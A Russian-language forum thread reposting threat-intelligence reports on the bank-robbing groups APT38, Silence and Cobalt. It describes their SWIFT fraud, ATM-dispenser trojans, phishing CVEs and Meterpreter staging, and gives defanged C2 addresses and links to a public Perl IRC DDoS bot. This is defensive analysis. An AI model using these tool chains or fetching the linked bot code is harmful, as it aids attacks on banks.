                  Главный герой доклада — группа АРТ38, нацеленная прежде всего на финансовые преступления, в частности взлом банковских систем и кражу огромных сумм, в том числе из банкоматов. Специалисты предполагают, что с 2014 года хакеры из АРТ38 украли около 1,1 миллиарда долларов! Также эксперты FireEye выделили группу Lazarus, которая призвана сеять хаос и дестабилизировать работу крупных организаций, например с помощью WannaCry. Также «Лазарю» приписывают атаку на Sony Pictures в 2014 году. Третья группировка TEMP.Hermit специализируется на кибершпионаже и атаках на оборонные и государственные объекты.

                  Тем не менее эти три группировки, безусловно, связаны. В частности, совпадает 260 байт в рансомвари WannaCry, которой пользуется Lazarus, и бэкдоре Whiteout, которым пользуется АРТ38. Помимо этого, эксперты нашли общий захардкоженный массив данных у бэкдоров Macktruck и NestEgg, принадлежащих группировкам TEMP.Hermit и АРТ38 соответственно.


                  Специалисты FireEye на данный момент определили 26 уникальных семейств малвари, которые принадлежат перу АРТ38. Также группа использует два публично доступных семейства. Этот арсенал включает бэкдоры, вайперы, туннелеры и дата-майнеры. Если хочешь знать все подробности об их арсенале, смотри последние разделы доклада.

                  По мнению экспертов FireEye, группировка APT38 сосредоточила фокус именно на финансовых преступлениях, потому что ее главная задача — добывать деньги на содержание своей страны. Новые и новые санкции со стороны ООН серьезно потрепали экономику КНДР, а режим и армия сами себя не прокормят. И чем суровее санкции, тем активнее становятся «заработки».

                  INFO
                  В 2013 году, после очередного испытания северокорейской ядерной бомбы, Совет Безопасности ООН ввел новые санкции против КНДР. Теперь они касались не только военных разработок, но и денежных переводов, поступающих в Северную Корею из международной финансовой системы.
                  По хронологии атак АРТ38, воссозданной экспертами, видно, что хакеры охотятся исключительно на банки. Раньше эти атаки приписывали группам TEMP.Hermit и Lazarus, но в ходе расследования стало ясно, что у КНДР есть специализированная группировка для кражи денег.


                  2014 год — группа намечает цели будущих атак
                  Именно тщательная подготовка отличает группировку АРТ38 от многих коллег, да и в целом характерна для АРТ как класса атак. По информации FireEye, иногда хакеры находились в скомпрометированной системе цели месяцы и годы, анализируя уязвимости. В одном из случаев члены АРТ38 изучали работу компании изнутри на протяжении 155 дней, прежде чем совершить атаку. А рекордный срок — почти два года, 678 дней.

                  Да и не каждый раз дело заканчивалось кражей денег, первое время хакеры просто изучали, как работают финансовые системы. Например, в начале 2014 года они внедрили бэкдор NESTEGG и кейлоггер KEYLIME в один из банков в Юго-Восточной Азии, но до атаки на SWIFT дело так и не дошло.

                  Группа начала с прощупывания целей по соседству. Скорее всего, в своем регионе у АРТ38 было больше возможностей для отмывания украденных денег. Не прошло и пары лет, как группа расширила свою активность до глобальных масштабов.

                  Оценивая все усилия АРТ38, долгие разведывательные операции, исследование работы систем и даже отдельных пользователей, а также сопровождение денег после кражи, специалисты FireEye делают выводы о большом количестве персонала и сложной структуре группировки по всему миру.

                  Что такое APT
                  APT (Advanced Persistent Threat — развитая устойчивая угроза) — это класс целенаправленных атак как противоположность массовым атакам. АРТ обычно заранее тщательно спланированы, многоэтапны и включают элементы первоначальной разведки.

                  Без сомнений, северокорейская группировка относится именно к этому типу, поэтому ее обозначили как АРТ38. Кстати, предположительно российскую группировку Fancy Bear называют также АРТ28, ты наверняка слышал про их детище NotPetya и атаки на украинские электростанции.

                  Декабрь 2015 года — попытка взлома ханойского банка Tien Phong Bank
                  Хакеры из APT38 попытались вывести более миллиона евро через систему SWIFT и передать их в один из банков Словении, но кража не состоялась. Сотрудники TPBank вовремя заметили подозрительные действия и остановили движение средств. Представители вьетнамского банка предполагают, что малварь работала у одного из их внешних подрядчиков, отношения с которым они немедленно разорвали.

                  Это был первый раз, когда хакеры использовали свою малварь (DYEPACK) для сокрытия следов. Этот инструмент позволяет менять локальные данные о совершенных в системе SWIFT транзакциях, чтобы мошенничество трудно было вовремя обнаружить.

                  SWIFT
                  SWIFT (Society for Worldwide Interbank Financial Telecommunication — Общество всемирных межбанковских финансовых каналов связи) — международная межбанковская система передачи информации и совершения платежей. Эта технология используется еще с 1970-х годов. Головной офис SWIFT находится в Брюсселе, а владеют этим кооперативным обществом более 9 тысяч банков по всему миру.

                  SWIFT — излюбленная цель хакеров из АРТ38 и основа банковской деятельности по всему миру. К этой системе подключены порядка 11 тысяч банков и финансовых организаций, у каждого из которых есть уникальный SWIFT-код. Система SWIFT, по сути, передает от банка к банку сообщения, платежные поручения, которые проверяются и обрабатываются, и каждой транзакции присваивается собственный номер.

                  Хакеры из APT38 создали малварь, которая позволяла не только выпускать неавторизованные сообщения, но и скрывать факт их отправки. Причем им удавалось не только стирать записи об отправке средств, но и блокировать сообщения, подтверждающие транзакцию. Беднягам пришлось проштудировать все мануалы по работе с системой SWIFT, чтобы создать малварь, бьющую точно в цель.

                  Февраль 2016 года — атака на Центральный банк Бангладеш
                  Хакеры пытались украсть из ЦБ Бангладеш около миллиарда долларов, находившихся в Федеральном резервном банке Нью-Йорка. Они отправили 35 запросов на перевод, но только пять из них были обработаны. В результате первых четырех транзакций 81 миллион долларов ушел в филиппинский банк на четыре частных счета, и большую часть этих денег злоумышленники сразу же перевели дальше.

                  По пятому запросу 20 миллионов долларов направлялись в шри-ланкийскую частную компанию Shalika Foundation. Но, испугавшись невиданной суммы, представители местного банка вернули транзакцию на проверку назад по пути роутинга. Проверяя платежное поручение, сотрудник немецкого Deutche Bank заметил, что хакеры опечатались, написав Fandation вместо Foundation, и заблокировал подозрительную транзакцию.

                  Мошеннические транзакции можно было заметить еще на стороне бангладешского банка, вот только АРТ38 позаботились об этом заранее. В этом банке все транзакции SWIFT проверялись по бумажным распечаткам в конце дня, и, чтобы скрыть следы, малварь вмешалась в работу принтера. Затем злоумышленникам помог выходной день — в Бангладеш это пятница, — и, вернувшись к работе, сотрудники банка обнаружили множество сообщений от ФРБ Нью-Йорка.

                  Американские клерки обратили внимание на подозрительные платежные поручения, но, не дождавшись ответа от ЦБ Бангладеш, ушли на выходные. Таким образом, у преступников было достаточно времени, чтобы запутать следы и вывести украденные деньги.

                  «Атакующие определенно обладали глубокими и детальными познаниями о специфике контроля над операциями в пострадавших банках. Эти сведения они могли получить как от инсайдера, так и в результате кибератаки, также возможно и сочетание обоих вариантов», — гласило официальное заявление SWIFT.

                  Кстати, глава банка подал в отставку после этого происшествия.

                  Почти сразу представители SWIFT сообщили о второй атаке — на неназванный коммерческий банк во Вьетнаме. Там повторилась похожая схема, только вместо распечаток для проверки проведенных транзакций использовались отчеты в формате PDF. В этом случае хакеры из АРТ38 изменили программу — просмотрщик PDF так, чтобы мошеннические переводы не отразились в списке. Эти факты еще раз демонстрируют, как детально хакеры были знакомы с процедурами и внутренней кухней каждого банка.


                  INFO
                  Очередные санкции ООН в ответ на ядерные испытания в 2016 году еще больше ограничивают экономические возможности КНДР. В основном это жесточайшие ограничения экспорта из Северной Кореи по всем крупнейшим статьям.


                  Отравленный водопой
                  Похоже, с каждым новым витком санкций экономическое давление вынуждает хакеров действовать все более спешно. В октябре 2016 года АРТ38 начинает использовать новый инструмент — атаки типа watering hole (водопой). Такие атаки названы по аналогии с тактикой хищников, которые охотятся у водопоя, поджидая добычу — животных, пришедших напиться.

                  Хакеры же внедряют вредоносное ПО на сайты, чаще всего нишевые, которыми постоянно пользуются намеченные жертвы. АРТ38 использовали в качестве «водопоев» медиапорталы, специализирующиеся на криптовалютах, — это как раз было на пике криптовалютного хайпа в 2016 году. Эти сайты действительно много посещали представители финансовых компаний и банков, искавшие информацию о разных койнах и ICO. Еще ловушки расставляли на новостных сайтах по теме бизнеса и финансов, а также на биржах.

                  Пара слов о санкциях
                  В 2017 году ООН ограничивает экспорт основных товаров из КНДР еще сильнее, а также запрещает создание совместных предприятий с участием северокорейского капитала. Между тем система SWIFT полностью блокирует доступ к системе всем северокорейским банкам. Китайские корпорации перестают импортировать в КНДР нефтепродукты, а китайские банки приостанавливают работу с северокорейскими гражданами и фирмами. КНДР продолжает испытания оружия.

                  Октябрь 2017 года — атака на Дальневосточный международный банк (FEIB) на Тайване
                  Для изначального проникновения хакеры использовали таргетированный фишинг, рассылая письма со ссылками на скачивание якобы документов Office и PDF. На самом деле ссылки вели на бэкдоры. Проникнув в сеть банка через SMB, они внедрили свою кастомную малварь и уже через пару дней получили учетные данные от двух аккаунтов SWIFT.

                  Через систему SWIFT хакеры отправили несколько платежных поручений на общую сумму 60 миллионов долларов в банки США, Камбоджи и Шри-Ланки. Большая часть транзакций не прошла из-за неточности в заполнении поручения на обеспечение платежей, так что тайваньский банк понес лишь незначительные убытки.

                  Шриланкийским подельникам удалось снять часть денег, переведенных из FEIB, — 195 тысяч долларов, но, когда они вернулись в Bank of Ceylon за остальными деньгами, их уже ждали с наручниками. Для небольшого государства перевод в 1,2 миллиона выглядел слишком подозрительно.


                  Как только атака была обнаружена, хакеры запустили во внутреннюю сеть банка модифицированную версию шифровальщика Hermes, которая не требовала выкуп, а отображала сообщение «Finish work» и оставляла во всех директориях файл с именем UNIQUE_ID_DO_NOT_REMOVE. Таким образом они зашифровали возможные улики и затруднили расследование.

                  Январь 2018 года — попытка ограбления Bancomext в Мексике
                  Однажды утром работа банка Bancomext пошла как-то не так: некоторые сотрудники не смогли включить свои компьютеры, интернет работал медленнее обычного, машины тормозили — а еще в этот день объем транзакций был в пару раз больше обычного. Просто хакеры из АРТ38 пытались украсть у Bancomext более 110 миллионов долларов.

                  Забавно, что перевод они оформили в виде пожертвования от мексиканского банка в пользу корейской церкви. Сотрудники банка вовремя заметили подозрительные транзакции и заблокировали платеж. Им повезло, что в Корее было три часа ночи и тамошний банк не мог обработать входящий перевод, так что деньги не успели утечь дальше.

                  Все же Bancomext пришлось временно приостановить работу до выяснения обстоятельств: операции были заморожены, работники разошлись по домам, были выключены телефон и почтовый сервер, так что без потерь не обошлось. Но убытки от простоя не идут в сравнение с несостоявшейся кражей.

                  Как потом выяснилось, система банка была скомпрометирована за много месяцев до попытки перевода денег — хакеры из АРТ38, как обычно, собирали информацию о работе банка, чтобы получше скрыть готовящееся преступление.


                  Май 2018 года — попытка ограбления Banco De Chile
                  Пресс-служба банка сначала отрицала кибератаку, но затем признала, что банк атакован неким «вирусом». Тем временем сотрудники банка публиковали в соцсетях фотографии своих компьютеров, по которым понятно, что малварь стерла master boot record и система перестала загружаться.


                  Кроме того, на одном чилийском форуме опубликовали скриншот частной переписки с сотрудником банка. Из переписки было понятно, что атака вывела из строя более 9 тысяч компьютеров и 500 серверов. Хакеры использовали вайпер, известный как KillMBR или KillDisk, чтобы не оставить никаких улик киберкриминалистам.

                  Служба безопасности банка попалась на отвлекающий маневр и пыталась восстановить работоспособность компьютеров, а хакеры занялись кражей денег через систему SWIFT. По словам генерального директора, в результате мошеннических транзакций банк потерял 10 миллионов долларов — деньги были отправлены в один из банков Гонконга.

                  Август 2018 года — взлом индийского Cosmos bank
                  Недавняя атака проводилась в два этапа. 11 августа с 15:00 до 22:00 подставные «мулы» в 28 странах мира массово выгружали деньги из банкоматов — за эти семь часов было выполнено более 15 тысяч транзакций. Мошенники использовали клонированные карты.

                  Все внимание отдела безопасности банка было направлено на банкоматы, но через день, в понедельник, 13 августа, группа АРТ38 вступила в игру со своей обычной схемой переводов через SWIFT. Преступники перевели почти 2 миллиона долларов на счет в одном из гонконгских банков. Расследование все еще идет, так что информация об атаке засекречена. Руководство индийского банка надеется отследить и вернуть хотя бы часть украденных денег.

                  Холодная война
                  Многочисленные атаки АРТ38 на SWIFT, конечно, повлекли за собой усиление безопасности системы переводов. В частности, в 2016 году представители SWIFT объявили о запуске новой программы безопасности клиентов. Но и северокорейские хакеры непрерывно совершенствуют свои инструменты. Вряд ли эта гонка вооружений остановится в ближайшее время, особенно если учесть, что ООН все туже закручивает гайки для КНДР.

                  В сентябре Министерство юстиции США предъявило обвинения гражданину Северной Кореи по имени Пак Чин Хёк. Обвиняют его в участии во всех атаках, которые приписывают северокорейским группировкам, включая взлом Sony Pictures в 2014 году, кражу из Центробанка Бангладеш и распространение шифровальщика WannaCry.

                  Свои заявления представители Минюста подкрепили детальным отчетом на 179 страницах. В докладе приводится множество доказательств: email, IP-адреса, а также повторно используемые отрывки кода и схемы шифрования. Подозреваемому грозит около 25 лет тюрьмы, если тот когда-нибудь окажется в руках американской системы правосудия.
                  Телега - @trener_dm
                  Ссылка https://t.me/trener_dm

                  Комментарий


                  • #10
                    SILENCE

                    SILENCE — АКТИВНАЯ МАЛОИЗУЧЕННАЯ ХАКЕРСКАЯ ГРУППА, КОТОРАЯ ОЧЕНЬ БЫСТРО УЧИТСЯ, В ТОМ ЧИСЛЕ, НА СОБСТВЕННЫХ ОШИБКАХ И ОПЫТЕ ДРУГИХ ГРУПП

                    В августе 2017 года Нацбанк Украины предупредил государственные и частные банки о масштабной фишинговой рассылке. Ее авторы использовали эксплоит из арсенала прогосударственной хакерской группы APT28. Однако сам инструмент, как выяснили в Group-IB, был модифицирован специально под атаку на банки — судя по всему, авторы рассылки обладали глубокими навыками реверс-инжиниринга.
                    Украинский ЦБ тогда связал эту атаку с новой волной эпидемии вируса шифровальщика NotPetya, но это были не прогосударственные хакеры. Можно было предположить, что эта целевая атака — дело рук наиболее агрессивных хакерских групп уровня Cobalt или MoneyTaker. Но и эта гипотеза не подтверждалась. Те, с кем столкнулись специалисты Group-IB, оказались малоизученной, молодой и активной хакерской группировкой, которая очень быстро училась, в том числе и на собственных ошибках.
                    Новое явление хакерской сцены получило название Silence. Это имя уже звучало в сообщениях антивирусных вендоров, однако никаких технических подробностей о группе до появления данного отчета не было.
                    Хакерские группы, специализирующиеся на целенаправленных атаках на банки, — Anunak, Corkow, Buhtrap — имели отношение к управлению ботсетями. Silence — исключение из правил. Еще в начале своего пути, летом 2016 года, Silence не имела навыков взлома банковских систем и в процессе своих первых операций училась прямо по ходу атаки. Они внимательно анализировали опыт, тактику, а также инструменты других преступных групп.
                    Они постоянно пробовали применять на практике новые техники и способы краж из различных банковских систем, в числе которых АРМ КБР, банкоматы, карточный процессинг.
                    Навыки в области реверс-инжиниринга и пентеста, уникальные инструменты, которые хакеры создали для взлома банковских систем, выбор неизвестного трояна для патчинга, а также многочисленные ошибочные действия подтверждают гипотезу о том, что бэкграунд Silence, скорее всего, легитимный. Как минимум один из хакеров работал (или продолжает работать) в компании, специализирующейся на информационной безопасности. Чем дольше мы изучали группу, тем более устойчивой становилась версия о том, что мы имеем дело с одним или несколькими whitehat, которые перешли на темную сторону.

                    После того, как Group-IB вышла на след Silence, ее участники перешли в контратаку. Одно из фишинговых писем было сознательно направлено на адрес CERT-GIB (Центр реагирования на инциденты информационной безопасности Group-IB). Вряд ли это была атака в чистом виде, скорее «вызов». И мы его приняли.

                    Данный отчет является первым подробным исследованием, раскрывающим преступления группы Silence.

                    Silence — новая угроза для банков
                    Первые следы хакерской группы, получившей название Silence, эксперты Group-IB обнаружили в июне 2016 года. Тогда киберпреступники только начинали пробовать свои силы. Одной из первых целей Silence стал банк в России, который они попытались атаковать через АРМ КБР. После чего хакеры надолго «замолчали». Позже выяснилось, что это стандартная практика для Silence. Они атакуют избирательно, между инцидентами проходит около трех месяцев, что втрое больше, чем у других групп, специализирующихся на целевых атаках, например, у MoneyTaker, Anunak (Carbanak), Buhtrap или Cobalt.
                    Причина — в крайне малочисленном составе Silence. Впервые за всю практику киберразведки и расследований киберпреступлений Group-IB мы встречаемся с такой структурой и ролевым распределением в группе. Silence постоянно анализируют опыт других преступных групп, пробуют применять новые техники и способы краж из различных банковских систем, включая АРМ КБР, банкоматы, карточный процессинг. Менее чем за год объем хищений Silence вырос в пять раз.

                    Группа
                    Рабочая версия экспертов Group-IB предполагает, что в команде Silence четко прослеживаются две роли — оператора и разработчика. Вероятно, оператор является лидером группы, по характеру действий он — пентестер, хорошо знакомый с инструментарием для проведения тестов на проникновение в банковскую инфраструктуру. Эти знания позволяют группе легко ориентироваться внутри атакуемого банка. Именно оператор получает доступ к защищенным системам внутри банка и запускает процесс хищений.
                    Разработчик параллельно является реверс-инженером с достаточно высокой квалификацией. Его академические знания о том, как создаются программы, не мешают ему делать ошибки в коде. Он отвечает за разработку инструментов для проведения атак, а также способен модифицировать сложные эксплойты и чужие программы. При этом для патчинга он использует малоизвестный троян, ранее не встречавшийся ни у одной другой группы. Кроме
                    того, он знает технологии работы банкоматов и имеет доступ к сэмплам вредоносного ПО, которые, как правило, содержатся в базах компаний, занимающихся информационной безопасностью.


                    Язык
                    Как и большинство финансово-мотивированных APT-групп, участники Silence русскоговорящие, о чем свидетельствуют язык команд программ, приоритеты по расположению арендуемой инфраструктуры, выбор русскоязычных хостеров и локация целей преступников:
                    • Команды трояна Silence — русские слова, набранные на английской раскладке:
                    htrjyytrn > reconnect > реконнект
                    htcnfhn > restart > рестарт
                    ytnpflfybq > notasks > нетзадач
                    • Основные цели находятся в России, хотя фишинговые письма отправлялись также сотрудникам банков в более чем 25 странах в Центральной и Западной Европы, Африки и Азии.
                    • Для аренды серверов Silence пользуются услугами русскоговорящих хостеров.

                    ХИЩЕНИЯ
                    Хронология атак
                    2016 год, июль — неудачная попытка вывода денег через российскую систему межбанковских переводов АРМ КБР. Злоумышленники получили доступ к системе, но атака сорвалась из-за неправильной подготовки платежного поручения. В банке остановили подозрительную транзакцию и провели реагирование собственными силами, постаравшись устранить последствия атаки. Это привело к новому инциденту.
                    2016 год, август — новая попытка взлома того же банка. Спустя всего месяц (!), после провала с АРМ КБР, хакеры восстанавливают доступ к серверам этого банка и предпринимают повторную попытку атаковать. Для этого они загрузили программу для скрытого создания скриншотов экрана пользователя и начали изучать работу операторов по псевдо-видеопотоку. На этот раз банк принял решение о привлечении экспертов Group-IB для реагирования на инцидент. Атака была предотвращена. Однако восстановить полную хронологию инцидента не удалось, т.к. при попытке самостоятельно очистить сеть, ИТ-служба банка удалила большую часть следов активности злоумышленников.
                    2017 год, октябрь — первый известный нам успешный случай вывода денег этой группой. На этот раз Silence атаковали банкоматы. За одну ночь им удалось похитить 7 млн. рублей. В этом же году они проводили DDoS-атаки с помощью Perl IRC бота, используя публичные IRC чаты для управления троянами.
                    После неудачной атаки через систему межбанковских переводов в 2016 году преступники больше не пытались вывести деньги через нее, даже имея доступ к серверам АРМ КБР.
                    2018 год, февраль — успешная атака через карточный процессинг: за выходные им удалось снять с карточек через банкоматы партнера банка 35 млн. рублей.
                    2018 год, апрель — уже через два месяца группа возвращается к прежней схеме и выводит деньги через банкоматы. Им удается за одну ночь «вынести» порядка 10 млн. рублей. На этот раз созданные Silence программы были усовершенствованы: избавлены от лишних функций и прежних ошибок.

                    География
                    Успешные атаки Silence ограничиваются странами СНГ и Восточной Европой, а основные цели находятся в России, Украине, Белоруссии, Азербайджане, Польше, Казахстане.
                    Однако единичные фишинговые письма отправлялись также сотрудникам банков в более чем 25 странах Центральной и Западной Европы, Африки и Азии: Киргизия, Армения, Грузия, Сербия, Германия, Латвия, Чехия, Румыния, Кения, Израиль, Кипр, Греция, Турция, Тайвань, Малайзия, Швейцария, Вьетнам, Австрия, Узбекистан, Великобритания, Гонконг и другие.

                    ИНСТРУМЕНТЫ И ИНФРАСТРУКТУРА
                    Первые шаги
                    По данным Лаборатории криминалистики Group-IB, во время первых операций хакеры Silence использовали чужие инструменты и учились буквальнопо ходу атаки. Однако со временем они перешли от использования чужих инструментов к разработке собственных и значительно усовершенствовали тактику.
                    В первых операциях киберпреступники патчили чужой малораспространенный бэкдор Kikothac. Они выбрали троян, известный с ноября 2015 года, реверс и реализация серверной части которого не требовали много времени.
                    Использование чужого бэкдора позволяет предположить, что группа начала работу без предварительной подготовки, и первые операции были лишь попыткой проверить свои силы.

                    Инструменты
                    Позже преступники разработали уникальный набор инструментов для атак на карточный процессинг и банкоматы, который включает в себя самописные программы:
                    • Silence — фреймворк для атаки на инфраструктуру.
                    • Atmosphere — набор программ для «потрошения» банкоматов.
                    • Farse — утилита для получения паролей с зараженного компьютера.
                    • Cleaner — инструмент для удаления логов удаленного подключения.
                    Заимствованные инструменты:
                    • Smoke bot — бот для проведения первой стадии заражения.
                    • Модифицированный Perl IRC DDoS bot, основанный на Undernet DDoS bot, для осуществления DdoS-атак.

                    Фишинговые рассылки
                    Вначале для рассылок писем группа использовала взломанные серверы и скомпрометированные учетные записи, однако позже преступники начали регистрировать фишинговые домены и создавать для них самоподписанные сертификаты.
                    Для того, чтобы обойти системы фильтрации писем, они используют DKIM и SPF. Письма отправляются от имени банков, у которых не был настроен SPF, с арендованных серверов с подмененными заголовками. Злоумышленники составляли полные грамотные тексты для писем и отправляли их от имени сотрудников банка, чтобы повысить шанс успешности атаки.
                    Во вложении письма содержались эксплоиты под MS Office Word с decoy документами CVE-2017-0199, CVE-2017-11882+CVE-2018-0802, CVE-2017-0262, а также CVE-2018-8174. Помимо эксплоитов рассылались письма со вложенными CHM-файлами, что встречается достаточно редко, а также с ярлыками .LNK, запускающими Powershell-скрипты и JS-скрипты.

                    Управление атакой и закрепление в системе
                    Оператор проводит атаки с Linux-машины с использованием утилиты WinExe (Linux аналог PSExec), которая может запускать программы на удаленном узле через SMB-протокол. После закрепления в системе троян Silence устанавливает stager Meterpreter на зараженную систему. Для доступа к скомпрометированным компьютерам киберпреступники используют Radmin — программу, которую в некоторых банках устанавливают сами администраторы для удаленного управления рабочими станциями.

                    Серверная инфраструктура

                    Арендованные злоумышленниками серверы для осуществления фишинговых атак находятся в России и Нидерландах. Под командные центры они используют услуги хостинга с Украины, который позволяет размещение практически любого контента, в том числе запрещенной информации, вредоносных приложений и файлов. Также несколько серверов Silence арендовали в MaxiDed, инфраструктура которого была заблокирована Европолом в мае 2018 года.

                    Silence: развитие инструментов и типы атак


                    ИНСТРУМЕНТАРИЙ
                    Важной особенностью группы Silence является использование уникальных инструментов, разработанных ими для проведения атак. К таким инструментам относится одноименный фреймворк Silence, уникальный набор для атаки на банкоматы — Atmosphere pack, утилита для получения паролей с зараженного компьютера — Farse, а также инструмент для удаления логов удаленного подключения Cleaner.

                    Silence
                    Уникальный фреймворк Silence, используемый группой, является модульным и состоит из следующих компонентов (обнаруженных нами, их список может быть шире):
                    • загрузчик Silence.Downloader
                    • основной модуль Silence и пропатченный бэкдор Kikothac
                    • модуль слежки за пользователем Silence.SurveillanceModule
                    • proxy Silence.ProxyBot
                    При этом основной модуль может прогрузить любой другой исполняемый файл, что не ограничивает функциональность системы и расширяет ее возможности.
                    В ранних атаках вместо Silence применялся пропатченный бэкдор Kikothac.

                    После открытия вложенного аттача в виде эксплоита под MS Office происходит загрузка и установка загрузчика для трояна Silence.Downloader. Загрузчик прописывается в автозагрузку и ожидает команду на загрузку и запуск следующей стадии. В случае если сервер не представляет интереса для атакующего, то бот получает команду на самоудаление.

                    Основное тело трояна Silence после запуска также прописывает себя в автозагрузку, после чего регистрируется на сервере, а затем переходит в цикл получения и исполнения команд. Основная задача трояна — выполнение удаленных команд в командном интерпретаторе, а также загрузка и запуск произвольного ПО.


                    Для доступа в изолированные сегменты корпоративной сети Silence догружает модуль ProxyBot. Задача этой программы — перенаправить через зараженный компьютер трафик от внешнего сервера злоумышленника до локальных узлов скомпрометированной сети, доступ к которым извне закрыт. Данная программа была обнаружена в двух видах: первая была написана на Delphi, вторая — на C#.

                    Для изучения работы оператора скомпрометированного компьютера злоумышленники устанавливали SurveillanceModule, который скрытно создавал снимки рабочего стола, из которых затем можно было склеить псевдо-видеопоток.
                    На последнем этапе атаки бот устанавливает stager Meterpreter в систему, что позволяет автоматизировать работу по перемещению в сети.
                    Проанализировав управляющие серверы, мы также обнаружили бэкдор Kikothac, взаимодействующий с одним из серверов Silence 46.183.221[.]89 Сначала мы решили, что данная программа не связана с деятельностью Silence, однако время залива на публичную песочницу HybridAnalysis совпадало по времени с атакой Silence. Также сэмпл Kikothac был залит с тем же именем, под которым был загружен троян Silence на VirusTotal.
                    При подробном анализе обнаружилось, что ссылка на оригинальный адрес управляющего сервера отсутствует, а код, отвечающий за установку соединения с сервером использует ссылку на адрес, который был записан поверх статически слинкованного кода, генерируемого компилятором.
                    Помимо этого все команды Kikothac начинаются с символа #, в том числе команда на загрузку файла из сети #wget. Точно такая же команда реализована в трояне Silence, причем это единственная команда, начинающаяся с символа #. Любая другая строка, не входящая в список команд Kikothac, автоматически отправляется на исполнение в командный интерпретатор cmd.exe. То же самое делает и Silence.

                    Atmosphere
                    Для управления диспенсером банкоматов Silence используют уникальную программу Atmosphere. На протяжении всей видимой нам деятельности группы троян модифицировался, чтобы соответствовать требованиям Silence. Так троян изменил логику внедрения в процессы, его автор добавил ему гибкий инжектор, что позволило расширить перечень поддерживаемых банкоматов,с которыми работала группа. В дальнейшем троян был избавлен от ненужных функций, которые мешали или не использовались при работе преступников. Например, в последней версии программа не обрабатывала команды с пинпада, а генерируемый лог стал меньше. На начальном этапе развития программу перекомпилировали множество раз, что, скорее всего, привело к нескольким безуспешным попыткам извлечь наличность.

                    Хакеры удаленно устанавливают на банкомат Atmosphere.Dropper, в ресурсах которого содержится библиотека .DLL — основное тело трояна Atmosphere. После извлечения тела дроппер внедряет библиотеку в процесс с именем fwmain32.exe. Уже внутри управляющего процесса библиотека предоставляет возможность удаленного управления диспенсером. Как было отмечено выше, в первых версиях присутствовала возможность управления диспенсером с помощью пинпада, но позже эти функциональные возможности были удалены.
                    Команды передаются программе через файлы с определенным расширением. Программа считывает команды, исполняет, а затем по логике автора, должна переписывать файл мусором и удалять его для затруднения работы форензик-экспертов. Однако логика программы содержит ошибку, вследствие чего мусор не пишется поверх файла, а дописывается в конец. Данная ошибка встречается и в других программах, используемых группой Silence, что говорит о единственном авторе. Например, этот же участок кода использовался в программе для очистки журналов подключения Radmin. В ходе мероприятий по реагированию на инцидент информационной безопасности в одном из банков команда криминалистов Group-IB обнаружила порядка 11 программ Atmosphere, скомпилированных в разное время и с незначительными изменениями. В одной директории с программами были найдены сценарии для командного интерпретатора, а также отдельный Injector, который принимал на вход в виде аргументов путь до библиотеки DLL и идентификатор процесса, куда должен был внедрить указанную библиотеку. Однако сценарии передавали не идентификатор процесса, а имя целевого процесса, что в итоге привело к безуспешной попытке получить контроль над
                    диспенсером.

                    Undernet DDoS bot
                    При анализе одного из серверов Silence был обнаружен DDoS бот Perl IrcBot. 20 апреля 2017 года с адреса driley123@bellsouth[.]net были разосланы фишинговые письма с эксплоитом, который загружал на машину Silence.Downloader c адресом управляющего сервера 92.222.68[.]32. По адресам hxxp://92.222.68[.]32/bot.pl и hxxp://92.222.68[.]32/wolf/ вплоть до 18 июня 2018 года был доступен Perl IrcBot для проведения DdoS-атак.
                    Первое упоминание этой программы было обнаружено на испанском форуме в сообщениях 2014 года hxxps://forum.voidsec[.]com/thread-93.html. В сети были обнаружены модификации этого бота: hxxps://github[.]com/H1R0GH057/Anonymous/blob/master/ircabuse.pl и hxxps://gist.github[.]com/dreadpiratesr/7bccc6eed49150a8564a.
                    Версия, используемая Silence, основана на Undernet DDoS bot (доступен по второй ссылке), согласно уникальной строчке «PRIVMSG : 4,1 [Help] 9,1 Undernet PerlBot Main Help:».
                    Программы управляются через IRC сообщения. Использовались два сервера:
                    1. ira.pubcs16[.]ro — публичный сервер игроков в counter-strike через канал #test; позже использовался канал #PMA
                    2. piratesofcyber[.]tk

                    Smoke bot
                    В одной из англоговорящих рассылок 2017 года был JS-загрузчик, который устанавливал Smoke Bot в систему. Smoke Bot начал продаваться на андеграундных форумах в 2011 году, его продавцом является русскоговорящий злоумышленник под псевдонимом SmokeLdr.
                    Помимо функций загрузки и исполнения произвольных файлов, Smoke bot имеет в наличии:
                    • функции сбора парольной информации из браузеров, почтовых программ и другого ПО;
                    • функции сбора почтовых адресов из сохраненных почтовых аккаунтов;
                    • функции перехвата вводимых в браузеры данных;
                    • функции перехвата почтовых и FTP-паролей (в режиме реального времени);
                    • возможности сбора файлов по заданным критериям;
                    • модуль DDoS;
                    • модуль TeamViewer;
                    • модуль майнинга криптовалюты.
                    Телега - @trener_dm
                    Ссылка https://t.me/trener_dm

                    Комментарий


                    • #11
                      COBALT

                      COBALT

                      26 марта 2018 года Европол сообщил об аресте в испанском городе Аликанте лидера Cobalt — хакерской группировки, которую Банк России называл главной угрозой для банков. Размах их деятельности поражает: Cobalt, по оценкам Европола, похитила около 1 млрд евро у 100 банков в 40 странах мира: России, Великобритании, Нидерландах, Испании, Румынии, Белоруссии, Польши, Эстонии, Болгарии, Грузии, Молдавии, Киргизии, Армении, Тайване, Малайзии и так далее.

                      Вначале хакеры специализировались на бесконтактных (логических) атаках на банкоматы. Кроме систем управления банкоматами, киберпреступники старались получить доступ к платежным шлюзам и карточному процессингу. В конце 2017 года впервые в истории финансовой системы России они совершили успешную атаку на банк с использованием системы межбанковских переводов (SWIFT).

                      Долгое время “секрет успеха” Cobalt состоял в том, что хакеры тестировали новые инструменты и схемы, часто меняли локацию проведения атак и хорошо знали, как работают банки. После заражения компьютеров сотрудников банка группа Cobalt изучала внутреннюю инфраструктуру организации, наблюдала за рабочим процессом и только после этого проводила атаку. В среднем промежуток от проникновения до вывода денег составлял три-четыре недели, средняя сумма хищения — 100 млн руб.

                      Задержание лидера группы в Испании случилось значительно раньше, чем об этом официально объявили. Однако, даже после ареста мы фиксировали активные фишинговые рассылки группы Cobalt. В день официального анонсирования ареста Центр реагирования на киберинциденты (CERT) Group-IB зафиксировал вредоносную рассылку Cobalt от имени компании Spamhaus, некоммерческой организации, которая борется со спамом и фишингом.

                      Слияние и поглощение

                      На протяжении всего времени работы Group-IB на международном рынке информационной безопасности мы на блюдаем объединение различных киберкриминальных структур и вербовку отдельных представителей хакерских групп для совершения атак на банки и другие организации. Мы убеждены в том, что эта тенденция в ближайшие годы усилится. В данном отчете мы впервые публично заявляем о совместных операциях групп Cobalt и Anunak (Carbanak), а также приводим ретроспективу наиболее значимых атак с 2016 по 2017 год.




